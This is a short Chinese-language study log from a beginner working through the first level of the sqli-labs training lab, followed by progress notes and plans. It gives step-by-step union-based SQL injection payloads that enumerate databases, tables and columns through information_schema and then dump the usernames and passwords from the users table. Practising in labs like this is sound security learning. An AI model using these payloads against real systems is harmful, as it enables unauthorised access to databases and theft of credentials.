玩了几天sqli-lab了是时候总结一下学过的东西了。
sqli-lab1——报错注入
第一步,猜列数,用order by 猜列数,然后得到列数是3.
第二步,爆可回显字段,得到2,3列是可以回显的。?id=0' union select 1,2,3 -- - 至于这里为什么要用0而不是用1是因为根据具体php而看的,在这一关用0会爆出所有信息。
第三步,爆所有数据库。?id=0' union select 1,2,group_concat(schema_name) from information_schema.schemata -- -infromation_schema.schemata是一个特殊的表,听说show database是查询这个表的。可以得到全部数据库,然后就顺利的得到了系统数据库security。
第四步,爆表名。?id=0' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'-- - 然后看见一张关键的表users。
第五步,还是那样,爆字段。?id=0' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'-- - 最后愉快的发现了username和password的字段。
最后一步,爆内容。 ?id=0' union select 1,2,group_concat(username) from users -- -
?id=0' union select 1,2,group_concat(password) from users -- -
然后就得到了所有用户数据了。。emm这一关作为入门是真的挺不错的,很详细,也没有其他很复杂的思路和绕过,适合像我这样的新手入门。
进度:
sqli-lab 5/65
视频课一点没看,一些简单的盲注函数总算会用了,布尔型盲注感觉还行。
明日计划:
sqli-lab 6/65
是时候看看视频了,看看基于时间的盲注到底是怎么构造出来的,报错型盲注的具体用途。